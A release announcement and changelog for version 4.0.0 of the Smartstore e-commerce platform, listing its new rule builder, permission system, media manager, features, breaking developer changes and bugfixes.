Friday, June 26, 2020
Smartstore 4.0.0 is available
Highlights
- (NEW) Media Manager: Powerful and lightning-fast explorer/manager for media files (commercial plugin exclusively bundled with Pro Edition)
- (NEW) Rule Builder: Powerful rule system for visual business rule creation
  - Dozens of predefined rules out-of-the-box
  - Supports logical operators (AND/OR) and unlimited grouping/nesting
  - Cart rules: can be applied to discounts, shipping and payment methods
  - Customer rules: used to auto-assign customers to customer groups for 1-to-1 content targeting
  - Product rules: used to auto-assign products to categories based on filter definitions (e.g. price, brand, color, stock etc.)
- (NEW) New permission (ACL) system: Granular tree-based permission management based on customer groups. Supports inheritance to allow or deny entire permission ranges
- (NEW) Personalized product recommendations: Replaces homepage products dynamically with personalized product recommendations based on customer interests. (commercial plugin)
- (NEW) Geo Blocker: Restricts shop access based on visitor country or IP address ranges (commercial plugin)
- (NEW) Dashboard with charts: New dashboard widgets display key data like orders, customers, bestsellers etc. in nice graphical charts.
Breaking changes
- (Dev) Install\UninstallPermissions has been removed from IPermissionService. No longer needs to be called by plugins. Permissions are now automatically installed\uninstalled.
- (Dev) IDiscountRequirementRule and IShippingMethodFilter have been removed. Discounts and shipping methods can now be filtered by rule sets.
- (Dev) Customer navigation property CustomerRoles has been replaced by CustomerRoleMappings, a new entity for role mappings.
- The search index must be rebuilt due to various enhancements.
- (Dev) The wrong name of API endpoint LocalizedPropertys has been corrected and renamed to LocalizedProperties.
New Features
- Granular permissions: All permissions of a customer directly visible on the customer edit page.
- DEV: Added Visual Studio extension to create Smartstore Plugins
- GDPR-compliant Cookie Consent Manager
- SEO: XML Sitemap now includes blog, news and forum
- SEO: 301 redirect to the URL without trailing slash
- SVG support for image uploads.
- Schedule tasks: new property "Priority" runs tasks with higher priority first when multiple tasks are pending.
- Added XML Sitemap settings to backend UI.
- Add published property to ProductTag entity.
- Apply percentage discounts also on tier prices.
- Implement ACL and multistore capability on menu item level.
- Menu Builder items: implement support for icon (brand) color.
- Show bundle item images in order details like in shopping cart details.
- MegaSearch:
  - Added more text analysis options (e.g. Lucene.Net classic analyzer).
  - Added tool to display internal information about a search, such as Lucene.Net terms.
  - Find the grouped product when searching for the SKU, GTIN, MPN of a non individually visible, associated product.
  - Find product when searching for GTIN or MPN of an attribute combination.
  - Perf. Added option to ignore attribute filtering property on product level.
- Web-API:
  - Added a parameter to start an import after uploading import files.
  - Added endpoints for ProductPictures, ProductCategories and ProductManufacturers to allow updating DisplayOrder.
  - Added endpoints for NewsLetterSubscription.
- Direct links to variations on a product.
- Add ability to hide products from catalog, but not search.
- Implement hidden boolean setting that controls which catalog search engine implementation should be used in backend.
- Enable images and color values for search filters to be stored for specification attribute options.
- Add field for manufacturer bottom description like for categories.
- Add new field for product condition.
- ACL support for manufacturers.
- Add new field for tracking URL to shipment entity to better track shipments.
- (Page Builder) Added a Page Builder block to display blog posts.
Improvements
- Make MeasureDimension and MeasureWeight localizable.
- Show an example currency value for custom formatting value changes.
- Card deck instead of a grid for customer addresses on customer edit page.
- Display "price from" in product lists if any attribute combination price exists.
- Reworked blog & news section.
- Activated ReCaptcha without keys can cause the merchant to lock himself out of the shop.
- Export: let a provider directly export to a file stream instead of a memory stream.
- Topic editor should display all menu item nodes that reference the current topic.
- UI: ACL, discount and store selection should be done via multiple select2.
- Updated UserAgent Parser.
- TinyImage: updated WebP detection patterns.
- PayPal PLUS:
  - Apply order of payment methods in backend to the list of third-party payment methods in checkout.
  - Send the billing address when redirecting to PayPal.
- Hide cart payment button for payment methods without match of applied rule sets.
- MegaSearch: Support exact value match for numeric range filters.
- Hide option prices if "Call for price" is enabled.
- Debitoor: added an option to force a price type on invoices.
- BeezUp: export product costs.
- RTL: fixed alignment of product art badge.
- Sending of mails to customers uses generic message template now.
- UI: Added XmlSitemap settings to backend
- And many more other minor improvements
Bugfixes
- Export: Fixed KeyNotFoundException when batch size was 1.
- Fixed KeyNotFoundException when payment method friendly name ends with spaces.
- Cart: Fixed ShoppingCartSettings.ShowProductBundleImagesOnShoppingCart hides the bundle item name.
- MegaSearch:
  - Fixed the preset sorting order of products on a manufacturer page may be wrong depending on catalog settings.
  - Price facet filter bypasses Call for Pricing and shows the approximate price of a product.
  - The number of hits for product review facets was wrong in some cases.
  - Do not show facets for manufacturers or categories if they are limited to stores or subject to ACL.
  - Ghost facet filter groups will appear if a numeric value is assigned that matches to a different spec option.
- Page Builder:
  - Block with z-index < 0 can not be selected in story view - Block tools can reduce z-index below 0.
  - Manually editing/removing block cols/rows does not refresh grid state correctly.
  - Edit Mode rendering bug in Mac Safari
  - Added "Order" property to page Builder block to control rendering order of blocks in HTML output
- PayPal:
  - Fixed rare exception "Unsupported Media Type" (415) in PayPal PLUS.
  - Only process a partial refund IPN when the order refunded amount is zero. Otherwise the order refunded amount will be wrong.
- Customer import:
  - VatNumber and other fields were ignored.
  - Customer roles sometimes inserted several times.
  - Changed billing/shipping address was added instead of updating the existing one.
  - Region assigned to an address was not updated.
- Product tags:
  - Product tag count should filter also based on Visibility.
  - Product tag count sometimes not up-to-date due to missing cache clearance.
- Debitoor:
  - Avoid errors due to invalid quantity unit Id of 0.
  - Rework quantity units.
  - Sometimes the SKU was missing on invoices.
- Multistore mapping was ignored for manufacturers in sitemap.
- Categories limited to stores were not displayed in tree view.
- Fixed InvalidOperationException in CreatePdfInvoiceAttachment when an order is placed by a guest.
- The ShowDescriptionInSubPages setting should also be applied to the bottom category description.
- Recaptcha: doesn't work for product reviews, blog and news comments if hidden captcha is activated.
- Customer FullName is not populated after registration.
- Web-API: fixed authentication error "Value cannot be null. Parameter name: name" when login type is email.
- Payone: fixed wrong hash value if redirecting option is activated.
- Azure: opening the configuration page resulted in an error.
- Shipping by weight: the surcharge hint was not displayed correctly.
- Off-canvas menu shows wrong product count for brand menu items.
- Images of newly added variants could be deleted automatically due to wrong image transient state.
- Menu display order is ignored for widget zone header_menu_special_after.
- RTL: Manage categories tree view.
- Biz-Importer: If the TaxRate table was missing, the assignment of the tax category to the product was not set.
- Import: adding URL records requires cache to be cleared.
- The order list summary does not respect all list filters and shows wrong aggregate values.
- Removing gift card issue.
- A delivery time cannot be deleted if it is assigned to a variant combination of a deleted product.
- BeezUp: fixes ArgumentNullException, parameter name "source".
- Avoid redirecting to the account activation page when trying to log in for the first time.
- The checkout button disappears when moving a product from the shopping cart to the wishlist.
- Menu builder: in case of system menus the template can change accidentally when saving.
- Structured data: Replace length with depth property.
- 'View All' button from the offcanvas manufacturer menu causes 404 on mobile.
- Added missing sitemap task.
- ESD: browser freezes when editing file changelog
- And many more other minor fixes...
Comments (154)